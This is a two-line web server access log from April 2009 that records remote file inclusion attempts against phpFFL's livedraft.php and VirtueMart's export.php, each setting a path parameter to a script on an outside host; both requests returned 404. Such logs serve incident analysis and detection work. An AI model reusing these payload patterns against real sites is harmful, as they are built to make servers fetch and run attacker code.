72.36.149.90 - - [10/Apr/2009:04:37:55 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
89.187.131.186 - - [10/Apr/2009:04:37:57 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
